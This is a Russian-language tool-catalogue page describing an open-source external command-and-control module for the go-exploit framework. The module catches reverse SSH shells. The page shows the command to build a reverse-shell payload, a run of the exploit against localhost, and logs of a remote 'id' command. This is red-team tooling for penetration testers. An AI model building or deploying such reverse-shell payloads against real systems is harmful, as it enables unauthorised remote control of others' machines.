Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
external-c2-experiments — Внешний C2-модуль для go-exploit, который перехватывает обратные SSH-шеллы, предоставляя серверный слушатель и клиент полезной нагрузки для интеграции пользовательских C2-профилей в эксплойты. | Kitploit
Инструменты/GitHubGitHub/vulncheck-oss/external-c2-experiments
Фреймворки для эксплойтовЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеУтилиты и фреймворкиRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubvulncheck-oss/external-c2-experiments

external-c2-experiments

Внешний C2-модуль для go-exploit, который перехватывает обратные SSH-шеллы, предоставляя серверный слушатель и клиент полезной нагрузки для интеграции пользовательских C2-профилей в эксплойты.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Внешний C2: SSH

Модуль внешнего C2 для go-exploit, поддерживающий обратные SSH-шеллы. Дополнительно он служит демонстрацией того, как интегрировать профили внешнего C2 в ваши любимые полезные нагрузки. Цель — не предоставить полностью вооружённую полезную нагрузку с обходом защиты и продвинутыми техниками, а показать, как создавать каналы для полезных нагрузок, которые могут реализовывать более мощные модули обхода и легко интегрироваться в go-exploit.

Структура

  • Основной пакет c2ssh, реализующий интерфейсы и структуры для настройки сервера для перехвата SSH-полезных нагрузок
  • ./payload содержит реализацию полезных нагрузок для использования эксплойтом; функционально это SSH-клиент и тонкая обёртка вокруг exec, основанная на ответах сервера
  • ./example содержит тест самовоспроизведения, который выполняет скомпилированную примерную полезную нагрузку

Пример использования

  1. Скомпилируйте полезную нагрузку для использования в эксплойте, чтобы сделать её доступной для эксплойта; в настоящее время это отделено от фреймворка, поскольку вы не всегда используете полезные нагрузки на Go :)
  2. Запустите эксплойт
go build -ldflags "-s -w -X main.Rshost=127.0.0.1 -X main.Rsport=2223" -o reverse_shell
poptart@grimm $ go run example/exploit.go -lhost 127.0.0.1 -lport 2222 -rhost 127.0.0.1 -rport 1337 -e -fll DEBUG -ell DEBUG -t 0
time=2024-08-06T12:09:02.762-06:00 level=DEBUG msg="Using the HTTP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
time=2024-08-06T12:09:02.763-06:00 level=STATUS msg="Starting target" index=0 host=127.0.0.1 port=1337 ssl=false "ssl auto"=false
time=2024-08-06T12:09:02.763-06:00 level=DEBUG msg="External SSH Listener starting: 127.0.0.1:2222"
time=2024-08-06T12:09:02.766-06:00 level=DEBUG msg="SSH: Handshaking for 127.0.0.1:38878"
time=2024-08-06T12:09:02.768-06:00 level=STATUS msg="Active shell SSH: Connection accepted from [email protected]:38878 session: 451e905e22ffbc7ab6235ad73379eeea2c65ba532405d81a431e1c5159ba1179 (SSH-2.0-OpenSSH_9.7)"
id
time=2024-08-06T12:09:04.725-06:00 level=STATUS msg="Running command on SSH client: 'id'"
time=2024-08-06T12:09:08.812-06:00 level=SUCCESS msg="uid=1000(poptart) gid=100(users) groups=100(users),1(wheel),67(libvirtd)\n"
Скачать инструмент